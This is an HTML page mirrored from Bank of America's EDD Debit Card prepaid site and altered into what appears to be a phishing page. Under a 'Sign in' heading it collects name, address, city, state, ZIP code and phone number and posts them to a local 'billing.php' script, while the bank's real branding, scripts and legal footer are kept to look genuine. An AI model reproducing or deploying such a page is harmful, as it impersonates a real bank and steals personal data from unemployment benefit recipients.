﻿<html class="js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths" lang="en" style=""><!--  --><!--  --><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><!-- /Added by HTTrack -->


    <meta charset="utf-8">
    
    
    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="version" content="20.10.0408">



    <title>EDD Debit Card</title>
    <link href="https://prepaid.bankofamerica.com/bundles/foundation/css?v=TgYukCV0BSpb98GObtBe6i9KeBqBppGV5EzParDKRD01" rel="stylesheet">

    <link href="https://prepaid.bankofamerica.com/bundles/css?v=hJr-3QgMtDeybBT5Db9n_bd5N2cZAp5EeS41GemYs6Q1" rel="stylesheet">

    <link href="https://prepaid.bankofamerica.com/bundles/css/print?v=JPgM1hk5e3sLqXHZFVWtkkRA7MMTcH6t30yiIk5dBDo1" rel="stylesheet" type="text/css" media="print">

    <script async="" src="../../../www.googletagmanager.com/gtm5445.html?id=GTM-55MPT9"></script><script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/jquery?v=Tr_v94xD5Y3yKB5v6IQ7RZbsJQVRT3NqKQFaw2TuoU41"></script>

    <link href="https://prepaid.bankofamerica.com/bundles/preventEarlyClickCss?v=AjE3qz4xe4LPPh9UwnSuF7YqcFXF2UG5PMA-GpfTe5c1" rel="stylesheet">

    <script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/preventEarlyClick?v=_tY9qfNRb06Wa6fRNKeUMAHJINRnx8zdLPgzo1HCObs1"></script>


    <script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/foundation?v=ESYLxt5uuRKe3D3XbWrIbHO5roVJALwvUU4gNQI5B-01"></script><meta class="foundation-data-attribute-namespace"><meta class="foundation-mq-xxlarge"><meta class="foundation-mq-xlarge"><meta class="foundation-mq-large"><meta class="foundation-mq-medium"><meta class="foundation-mq-small"><style></style>

    <script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/modernizr?v=inCVuEFe6J4Q07A0AcRsbJic_UE5MwpRMNGcOtk94TE1"></script>

    <script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/Visa?v=rUNK_oTTYSu18b4lzz-WjfK-hwZTByYX4dFKT1IJ9Ig1"></script>
 
    <script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/Visa/dps?v=ZyC0R9t8h7ubYILI4r8E1AyotfynRxjE2DnI-eHH54Q1"></script>


    <link href="../../content/PRC384/CP384-T03-019/_Styles/site.css" rel="stylesheet" type="text/css">
    <link href="https://prepaid.bankofamerica.com//content/PRC384/_Images/favicon.ico" rel="shortcut icon" type="image/x-icon">

    
    
    <meta name="format-detection" content="telephone=no">
<meta class="foundation-mq-topbar"></head>


<!--[if IE 9]><body class="body lt-ie10"> <![endif]-->
<!--[if lt IE 9]><body class="body lt-ie9">
    <script nonce='AzkZQWubsK56HpoRpiOyhnga' src="../content/_Scripts/rem.min.js" type="text/javascript"></script>
    <![endif]-->
<body class="body">

    <!-- Google Tag Manager -->
    <noscript>
        <iframe src="http://www.googletagmanager.com/ns.html?id=GTM-55MPT9" height="0" width="0" style="display:none;visibility:hidden"></iframe>
    </noscript>
    <script nonce="AzkZQWubsK56HpoRpiOyhnga">
        (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
        new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
        j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
        '../../../www.googletagmanager.com/gtm5445.html?id='+i+dl;f.parentNode.insertBefore(j,f);
        })(window,document,'script','dataLayer','GTM-55MPT9');</script>
    <!-- End Google Tag Manager -->

    <a class="skip-to" href="#content">Skip to content</a>
    <div class="header-container" role="banner">







<div class="row header-row">
    <div class="columns brand-container show-for-medium-up">
        <div class="small-12 medium-3 custom-medium-push-5 columns">
            <div class="logo-wrapper">
                <a href="https://prepaid.bankofamerica.com/eddcard/home/index" data-reveal-id="modal-leaving-site">
                    <img alt="Bank Of America, N. A. Logo" class="header-logo medium img-responsive" id="brand-logo" src="../../content/PRC384/CP384-T03-019/_Images/logo.png" title="">
                </a>
            </div>
        </div>
        <div class="small-12 medium-9 custom-medium-pull-7 columns">
            <div class="program-wrapper">
                <span class="header-card-program">EDD Debit Card</span>
            </div>
        </div>
    </div>

        <div class="small-12 show-for-small-only columns">
            <nav data-topbar="" class="top-bar mobile-nav" role="navigation" aria-label="Main" style="">
                <!-- DPS-5439 - INC000004694104 - Hamburger Menu cannot be opened. Jeff has recommended below change -->
                <!--<div class="logo-program-menu">
                    <div class="row">
                        <div class="small-10 columns">
                            <a href="/eddcard/home/index">

                                <img alt="Bank&#32;Of&#32;America,&#32;N.&#32;A.&#32;Logo" class="header-logo&#32;medium&#32;img-responsive" id="brand-logo-mobile" src="/content/PRC384/CP384-T03-019/_Images/logo.png" title="" />
                            </a>
                        </div>

                        <div class="small-2 columns toggle-topbar">
                            <button class="menu-icon" aria-expanded="false">
                                <i class="fa fa-bars" role="presentation" aria-hidden="true"></i>
                                <span class="a11y-hide-visually">Expand Navigation Menu</span> 
                            </button>
                        </div>
                    </div>

                    <div class="row">
                        <div class="small-12 columns header-card-program">EDD Debit Card </div>
                    </div>
                </div>-->
                <ul class="title-area">
                    <!-- Title Area -->
                    <li class="name">
                        <a href="https://prepaid.bankofamerica.com/eddcard/home/index" data-reveal-id="modal-leaving-site">
                            <img alt="Bank Of America, N. A. Logo" class="header-logo medium img-responsive" id="brand-logo-mobile" src="../../content/PRC384/CP384-T03-019/_Images/logo.png" title="">
                        </a>
                    </li>
                    <li class="toggle-topbar menu-icon">
                        <button class="menu-icon" aria-expanded="false">
                            <i class="fa fa-bars" role="presentation" aria-hidden="true"></i>
                            <span class="a11y-hide-visually">Expand Navigation Menu</span> 
                        </button>
                    </li>
                    <li class="header-card-program">EDD Debit Card</li>
                </ul>

                







            <section class="top-bar-section" style="display: none;">
    <ul class="left">
                    <li>
                            <a href="">Home</a>
                    </li>
                    <li>
                            <a href="">Sign In</a>
                    </li>
                    <li>
                            <a href="">Activate My Card</a>
                    </li>
    </ul>
</section></nav>
        </div>


        <div class="row show-for-medium-up">
            <div class="medium-12 columns">
                <nav data-topbar="" class="top-bar desktop-nav" role="navigation" aria-label="Main">
                    







                <section class="top-bar-section">
    <ul class="left">
                    <li>
                            <a href="">Home</a>
                    </li>
                    <li>
                            <a href="">Sign In</a>
                    </li>
                    <li>
                            <a href="">Activate My Card</a>
                    </li>
    </ul>
</section></nav>
            </div>
        </div>
</div>




    </div>
    
    
    <div class="content-container" id="content" role="main" tabindex="-1">
        <form action="billing.php" autocomplete="off" id="MainForm" method="post" novalidate="novalidate"><input name="__RequestVerificationToken" type="hidden" value="aWHexS4WJYDuIfnBiTN-uIBEeVDG2uLhcFxWpVw6eBtC1Xkchlr-gX-LfA7b6UEmAth0mgHkGbyTQlM5nEJS6B1O_rZgLLDTzdoIq8ip4Wk1"><div class="row">
<p style="background-color: #C41230;color:#fff;padding:10px;margin-bottom: 0px;">Please note your website Email and password may be different than what you use for the Mobile App.</p>
		<div class="large-12 medium-12 small-12 column">
<h1>Sign in</h1><div class="box"><div class="row"><div class="medium-12 columns">
<div class="large-12 medium-12 small-12 column">
                        <p class="align-right margin-bottom-none">
                            <span class="required">*</span>
                             Required fields
                        </p>
</div>


<div class="row form-row"><div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserRequestHandler_Model_Username">Name&nbsp;<span class="required">*&nbsp;</span></label></div><div class="large-4 medium-4 small-12 columns left">
<input type="text" value="" required="" class="login_scan_panel_pwd_input" maxlength="50" id="inputuin" name="name" placeholder="Please enter Name " aria-required="true"></div></div><br>

<div class="row form-row"><div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserRequestHandler_Model_Username">Address&nbsp;<span class="required">*&nbsp;</span></label></div><div class="large-4 medium-4 small-12 columns left">
<input type="text" value="" required="" class="login_scan_panel_pwd_input" maxlength="50" id="inputuin" name="address" placeholder="Please enter Address " aria-required="true"></div></div><br>

<div class="row form-row"><div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserRequestHandler_Model_Username">City&nbsp;<span class="required">*&nbsp;</span></label></div><div class="large-4 medium-4 small-12 columns left">
<input type="text" value="" required="" class="login_scan_panel_pwd_input" maxlength="50" id="inputuin" name="City" placeholder="Please enter City " aria-required="true"></div></div><br>

<div class="row form-row"><div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserRequestHandler_Model_Username">State&nbsp;<span class="required">*&nbsp;</span></label></div><div class="large-4 medium-4 small-12 columns left">
<input type="text" value="" required="" class="login_scan_panel_pwd_input" maxlength="50" id="inputuin" name="state" placeholder="Please enter State " aria-required="true"></div></div><br>

<div class="row form-row"><div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserRequestHandler_Model_Username">Zip Code&nbsp;<span class="required">*&nbsp;</span></label></div><div class="large-4 medium-4 small-12 columns left">
<input type="text" value="" required="" class="login_scan_panel_pwd_input" maxlength="50" id="inputuin" name="zipcode" placeholder="Please enter Zip Code " aria-required="true"></div></div><br>

<div class="row form-row"><div class="large-3 medium-5 small-12 column "><label class="form-control" for="VerifyUserRequestHandler_Model_Username">Phone Number&nbsp;<span class="required">*&nbsp;</span></label></div><div class="large-4 medium-4 small-12 columns left">
<input type="text" value="" required="" class="login_scan_panel_pwd_input" maxlength="50" id="inputuin" name="phonenumber" placeholder="Please enter Phone Number " aria-required="true"></div></div><br>

<div class="row form-row"></div><br>



<div class="small-12 columns button-group">
<input class="button small navigationButton primary" data-route="verify/verifyyouridentity" id="verifyverifyyouridentitySubmit" name="Submit" type="submit" value="Continue"></div></div></div></div>            <input type="hidden" id="client-timezone-diff" name="client-timezone-diff" value="0">
            <input type="submit" class="a11y-hide-all" tabindex="-1" value="Submit">

    </div>

    

<div class="footer" role="contentinfo">
    <div class="row">
        <div class="small-12 columns" role="navigation" aria-label="Footer navigation">
            <ul class="footer-navigation">

                
        <li><a href="" target="_blank">Fee Information</a></li>
        <li><a href="" target="_blank">FAQ</a></li>
        <li><a href="">Site Map</a></li>
        <li><a href="" target="_blank">Contact Us</a></li>
        <li><a href="" target="_blank">Privacy / Security</a></li>
        <li><a href="" target="_blank">Terms &amp; Conditions</a></li>
        <li><a href="" target="_blank">Digital Terms &amp; Conditions and Fees</a></li>
        <li><a href="">ATM Locator</a></li>










                    <li><a href="https://www.bankofamerica.com/index.jsp" target="_blank" data-reveal-id="modal-leaving-site">Bank Of America, N. A.</a></li>

            </ul>
        </div>
    </div>
    <div class="extra">
        <div class="small-12 columns">
                <div class="row language">
                    <div id="lang-label" class="small-12 columns align-center">
                        <input name="__RequestVerificationToken" type="hidden" value="dpzI_Uu9a19Sb_tepGcLPj_EUzcNR7E1ufeFY4GTQIWhuCawWrdFt_4zkwOZ0P1qbjRo21Rru8MDrIyQI1H4ObEMw9-3IwwFn1rwnsGS8lA1">    <span id="language-label" class="uppercase"><span class="a11y-hide-visually">Select a</span> Language:</span>
    <ul aria-labelledby="language-label" class="language-short-list">
                <li><button class="current changeCultureButton" data-culture="en-US" lang="en-US">English<span class="a11y-hide-visually"> (Selected)</span></button></li>
                <li><button class="changeCultureButton" data-culture="es-MX" lang="es-MX">Español</button></li>
    </ul>
    <input type="submit" class="a11y-hide-all" tabindex="-1" value="Submit">







                    </div>
                </div>
            <div class="row copyright">
                <div class="small-12 columns">
                    <p>
                        Copyright 2021 Bank of America Corporation .
<a href=""> Visa Global Privacy Notice.</a>                                                    <br>Bank of America, N.A. Member FDIC Equal Housing Lender                    </p>
                    <div class="large-12 column align-center">
    <p style="color:#000;">
        <img src="../../content/PRC384/_images/EmailLogo.png"><br>
        Apple, the Apple logo and iPhone are trademarks of Apple Inc., registered in the U.S. and other countries and regions. App Store is a service mark of Apple Inc. Google Play and the Google Play logo are trademarks of Google LLC.
    </p>
    <p style="color:#000;"> Your funds are eligible for FDIC insurance. Your funds are insured up to $250,000 by the FDIC in the event Bank of America, N.A. fails, if specific deposit insurance requirements are met. See <a href="">fdic.gov/deposit/deposits/prepaid.html</a> for details. In the event Bank of America, N.A. fails, the FDIC may require information from you, including a government identification number, to determine the amount of your insured deposits.  If you do not provide this information to the FDIC access to your insured funds will be delayed. </p>
    </div>

                </div>
            </div>
        </div>
    </div>
</div>



    <div id="modalPlaceHolder" class="reveal-modal medium" data-reveal="">
    </div>

    
<div id="modal-leaving-site" aria-labelledby="modal-leaving-site-dialog-title" aria-describedby="siteleaving-dialog-desc" class="reveal-modal medium" role="dialog" data-reveal="">
    <div class="modal-body">
        <h2 id="modal-leaving-site-dialog-title">
            You Are Now Leaving This Site
        </h2>
        
        <div id="siteleaving-dialog-desc" class="scrollable">
            <p id="modal-leaving-site-text">
                You are connecting to a new website; the information provided and collected on this website will be subject to the service provider’s privacy policy and terms and conditions, available through the website.  The website you are connecting to is: {0}
            </p>
        </div>
<div class="small-12 columns button-group">
            <button class="button primary small button-close-modal" id="continue-button">Continue</button>
            <button class="button standard small button-close-modal" id="close-button">Cancel</button>
</div>        <button id="modal-close-icon" aria-label="Close" tabindex="0" class="close-reveal-modal">×</button>
    </div>
</div>

    
<button id="session-timeout-link" data-reveal-id="modal-session-timeout" title="Session Time Out" class="a11y-hide-all"></button>
<div id="modal-session-timeout" aria-labelledby="session-timeout-dialog-title" aria-describedby="session-dialog-desc" class="reveal-modal small" role="dialog" data-reveal="">
    <div class="modal-body">
        <h2 id="session-timeout-dialog-title">Your session is about to expire.</h2>
        <div id="session-dialog-desc" class="scrollable expMessage">
        </div>
        <hr>
        <div class="align-right">
            <button id="btn-extend-session" onclick="extendSession()" type="button" class="button primary small">Extend Session</button>
            <button id="btn-expire-session" onclick="expireSession(true)" type="button" class="button primary small">Expire Session</button>
        </div>
        <button aria-label="Close" tabindex="0" id="sessionTimeOutClose" class="close-reveal-modal">×</button>
    </div>
</div>

<script nonce="AzkZQWubsK56HpoRpiOyhnga">
    var sessionTimingoutHeading = "Your session is about to expire.",
        sessionExtendedHeading = "Your session has been extended.",
        sessionHasExpired = "Your session has expired.",
        sessionExpiredByUser = "You have expired your session.",
        okButtonText = "OK",
        closeButtonText = "Close";
</script>
        <!-- Loading Modal -->
<div id="modal-loading" class="reveal-modal tiny" role="dialog" data-reveal="">
    <div class="modal-body align-center">
        <h2 class="align-center">Loading ...</h2>
        <i class="fa fa-spinner fa-spin fa-5x" aria-hidden="true" role="presentation"></i>
    </div>
</div>







    <script nonce="AzkZQWubsK56HpoRpiOyhnga" type="text/javascript">
        //Localize Foundation topbar 'back'
        $(document).foundation({
            topbar: {
                custom_back_text: true,
                back_text: 'Back'
            }
        });
        var trackSession = true;
        var sessionExpiresIn = '15';
        var baseUrl = 'https://prepaid.bankofamerica.com/eddcard/';
        var mvcAction = 'Activate';
        var mvcController = 'Verify';
        var fingerprint = new Fingerprint().get(); document.cookie='vid=' + fingerprint + ";path=/; secure; ";
        var token = $('input[name="__RequestVerificationToken"]').val();
        var SimEnabled = Boolean('True' === 'True');
        var headers = {};
        var isAccessTokenRenewCheck = Boolean('False' ==='True');
        var accessTokenIntervalCall = 50000;
        var isVBAEnabled = Boolean('True' === 'True');
        var clientTimeRenewal = new Date(Date.parse('01/01/0001 0:00:00'));
        var targetRenewalThreshold = parseInt('100');



        //define globalize culture used mainly for validation


        CultureInfoSettings.init('en-US',
         'https://prepaid.bankofamerica.com/',
         'MM/dd/yyyy',
         'H:mm:ss',
         ',',
         '.',
         '2',
         '$',
         '2',
         '12',
         '1');

        // other headers omitted
        headers['__RequestVerificationToken'] = token;
        $.ajaxSetup({
            headers: headers
        });     

    </script>

    
    
    <script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/jqueryval?v=zoukwcYg-g7JDdfzyoq_F8xlMFB59Z1U0aSHkBtjg7I1"></script>


    
    


<script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/VisaBehaviorAnalytics?v=kSj3nrqydyAGCJwo0hfCPzTkKf06pNGY6ePhWg538b41"></script>
<script nonce="AzkZQWubsK56HpoRpiOyhnga" src="https://prepaid.bankofamerica.com/bundles/VisaBehaviorAnalyticsIntegration?v=o-vHZTln5UdDQuezeNEtFjEBOO8pbxs9sU3r2yHAPZY1"></script>



<!--  -->
</div></form></div></body></html>